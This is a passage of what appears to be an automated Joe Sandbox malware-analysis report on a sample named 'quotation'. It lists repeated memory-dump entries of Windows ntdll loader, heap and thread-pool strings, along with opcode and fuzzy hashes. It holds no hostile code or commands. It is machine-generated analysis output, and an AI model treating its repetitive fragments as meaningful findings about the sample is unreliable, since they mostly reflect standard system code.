                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01309A11, 01309A3A
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01309A01
                                                                                  • LdrpInitShimEngine, xrefs: 013099F4, 01309A07, 01309A30
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01309A2A
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013099ED
                                                                                  • apphelp.dll, xrefs: 012A6496
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  Strings
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01322178
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01322180
                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01322160, 0132219A, 013221BA
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01322165
                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0132219F
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013221BF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 012EC6C3
                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01328170
                                                                                  • LdrpInitializeImportRedirection, xrefs: 01328177, 013281EB
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01328181, 013281F5
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 013281E5
                                                                                  • LdrpInitializeProcess, xrefs: 012EC6C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                  APIs
                                                                                    • Part of subcall function 012F2DF0: LdrInitializeThunk.NTDLL ref: 012F2DFA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0BA3
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0BB6
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0D60
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0D74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                  • String ID:
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @+$@+$Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                  Strings
                                                                                  • @, xrefs: 012E8591
                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012E855E
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 012E8421
                                                                                  • LdrpInitializeProcess, xrefs: 012E8422
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013222B6
                                                                                  • .Local, xrefs: 012E28D8
                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013221D9, 013222B1
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 013221DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                  Strings
                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013110AE
                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01310FE5
                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01311028
                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0131106B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0131A9A2
                                                                                  • LdrpDynamicShimModule, xrefs: 0131A998
                                                                                  • apphelp.dll, xrefs: 012D2462
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0131A992
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  Strings
                                                                                  • HEAP[%wZ]: , xrefs: 012C3255
                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 012C327D
                                                                                  • HEAP: , xrefs: 012C3264
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $@
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0131A121
                                                                                  • LdrpCheckModule, xrefs: 0131A117
                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0131A10F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-161242083
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-1334570610
                                                                                  Strings
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0136C1C5
                                                                                  • PreferredUILanguages, xrefs: 0136C212
                                                                                  • @, xrefs: 0136C1F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  Strings
                                                                                  • LdrpCheckRedirection, xrefs: 0133488F
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01334899
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01334888
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-2558761708
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01332104
                                                                                  • LdrpInitializationFailure, xrefs: 013320FA
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 013320F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  Strings
                                                                                  • LdrResSearchResource Exit, xrefs: 012BAA25
                                                                                  • LdrResSearchResource Enter, xrefs: 012BAA13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                  • API String ID: 0-4066393604
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  Strings
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 012B063D
                                                                                  • kLsE, xrefs: 012B0540
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 012BA309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 012BA2FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: 97fd0842cafb4c4fde847463af2a3401422c31ed3c804d78f864106d211f158d
                                                                                  • Instruction ID: 342241e917494aa37e7134a3fc849f34fc3253f4abb707e14a68f6b771fd63b1
                                                                                  • Opcode Fuzzy Hash: 97fd0842cafb4c4fde847463af2a3401422c31ed3c804d78f864106d211f158d
                                                                                  • Instruction Fuzzy Hash: C291A132900649AFDB26AFA4DC44FEFFBB9EF45B44F100029FA01A7251E7749A01CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalTags
                                                                                  • String ID: .mui
                                                                                  • String ID: EXT-
                                                                                  • String ID: BinaryHash
                                                                                  • String ID: #
                                                                                  • String ID: BinaryName
                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0133895E
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 31d4710dd523f49c5666e13b8970e41cf9c429df420b772da17fd6d3b1883607
                                                                                  • Instruction ID: aee3a83dfb0ecd7a22fc4261ee1dbb03cba2d016c0f5cf4418991f46dc674bdf
                                                                                  • Opcode Fuzzy Hash: 31d4710dd523f49c5666e13b8970e41cf9c429df420b772da17fd6d3b1883607
                                                                                  • Instruction Fuzzy Hash: 99B16170A102668BDB25DF58D890BB9B3F5EF44704F4485EAE54AE7281EB709D85CF20
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 28932c885f105e0cf872c8c83eab6cd171de3251d5641c846fd2c159125909ed
                                                                                  • Instruction ID: 639565843b90db65e83b0d2796a976c7376ba5187c4b923410a22db4494107d1
                                                                                  • Opcode Fuzzy Hash: 28932c885f105e0cf872c8c83eab6cd171de3251d5641c846fd2c159125909ed
                                                                                  • Instruction Fuzzy Hash: 14A13731E106599FEB26DB9CC844BAEBBB8BF00718F064225EB10AB2D5D7749D44CBD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 076a95b615eed6b41b5e4a7b386d240c7a692200cb4121c755e2e487b6df695d
                                                                                  • Instruction ID: 184a788050ff9ad27fb7169921cb93c084fa9b8d18d09514e329e4b9072502df
                                                                                  • Opcode Fuzzy Hash: 076a95b615eed6b41b5e4a7b386d240c7a692200cb4121c755e2e487b6df695d
                                                                                  • Instruction Fuzzy Hash: 49A1D370B206269BEB25DF69C491BBAF7A6FF44328F04403DEB0597282DB74E801CB54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 228b6208d1012914ccb3438bb90795defccf3c050e783a91253430691a920ce5
                                                                                  • Instruction ID: fcf4c2395904cdbb9bb92badb20e44c4ac4ee952774b8fb07865406ba75b6f0f
                                                                                  • Opcode Fuzzy Hash: 228b6208d1012914ccb3438bb90795defccf3c050e783a91253430691a920ce5
                                                                                  • Instruction Fuzzy Hash: 47A1CD72A20312DFC721EF28C980B6ABBE9FF58718F45062CF6459BA50D734E900CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                  • Instruction ID: edcdc505bdfae12217251e3f108da0fe796f020ee3cd89e3306916fedaaded59
                                                                                  • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                  • Instruction Fuzzy Hash: 14B13971E0061ADFDF19DFA9C880AAEBBB5FF48314F148129E918A7350D730A945CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a8228ecdc92830d3949688f970fc0b2ee7af1d6d5ee6855831b29ae29d6b0d6
                                                                                  • Instruction ID: 359a9d4433c018e2750364719491fd3088fd547fdd608490d9af5190ef899a1e
                                                                                  • Opcode Fuzzy Hash: 2a8228ecdc92830d3949688f970fc0b2ee7af1d6d5ee6855831b29ae29d6b0d6
                                                                                  • Instruction Fuzzy Hash: BA9194B1D0021ABFDB15CF68D885BBEBFB5AF88714F154159E610EB351D734DA008BA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 77841a1a7f9b5dfed315978619cc3c58ecfed1cf0329945dbfe29013671a8010
                                                                                  • Instruction ID: 2e2cb05895df72b3a9ee59e64d4cf6104c834352be25ce6d80832da24793a7cc
                                                                                  • Opcode Fuzzy Hash: 77841a1a7f9b5dfed315978619cc3c58ecfed1cf0329945dbfe29013671a8010
                                                                                  • Instruction Fuzzy Hash: 45914971A20616CBEB28DB18D441B7DBFA1EFA4B58F06426DEF059B384EA34D901C751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                  • Instruction ID: 115c50d7af5e07e351146a547b78e7e9bdcd62af35b57c08599fb8e4fecb8470
                                                                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                  • Instruction Fuzzy Hash: 80816071A0020A9FDF29CF99C890ABEBBF6FF84314F188569D9169B345D738E901CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 658a0af87eb989816ab2550f7e4627b042961011624f48c7a2ae95e316bd0ce7
                                                                                  • Instruction ID: 029fd14194350dbd0c8795a5c7c1f38d0cc192e06a1feca92625d5ad8cff450c
                                                                                  • Opcode Fuzzy Hash: 658a0af87eb989816ab2550f7e4627b042961011624f48c7a2ae95e316bd0ce7
                                                                                  • Instruction Fuzzy Hash: 9D818D71A10609EFDB21DFA9C884BEEBBFAFF48314F518429E655A7250D730AC05CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e9dca386ec341ae43851ee0f41e6635ecbf0c28278e5969cd808b3f9f5f7105f
                                                                                  • Instruction ID: 7812cbd66024b9f64b63a9f8c8a7131699d99b3820f6cd18ec8175145e37284e
